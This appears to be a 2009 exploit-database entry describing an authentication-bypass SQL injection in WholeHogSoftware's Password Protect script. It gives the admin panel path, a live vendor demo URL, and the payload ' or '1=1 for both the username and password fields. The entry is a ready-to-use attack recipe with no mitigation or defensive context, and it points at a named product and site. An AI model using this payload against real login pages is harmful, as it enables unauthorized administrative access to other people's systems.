id: 4770
date: 02/02/2009
title: WholeHogSoftware Password Protect (Auth Bypass) SQL Injection Vuln
author: ByALBAYX
cves: 

==================================================================
WholeHogSoftware Password Protect (Auth Bypass) SQL Injection Vuln
==================================================================


#############################################
[~]Script   :Password Protect

[~]Site     :http://wholehogsoftware.com

[~]Price    :$20.00

[~]Detay    :http://www.wholehogsoftware.com/index.php/page/password_protect_enhanced
#############################################
[~]....


[~]Admin Path :http://c4team.org / [Password Protect_PATH] /admin/



[~]Username   : ' or '1=1



[~]Password   : ' or '1=1



[~]Demo       :http://www.wholehogsoftware.com/demo/password_protect_enhanced/admin


[~]....   vs..
#############################################



#  0day.today [2023-03-25]  #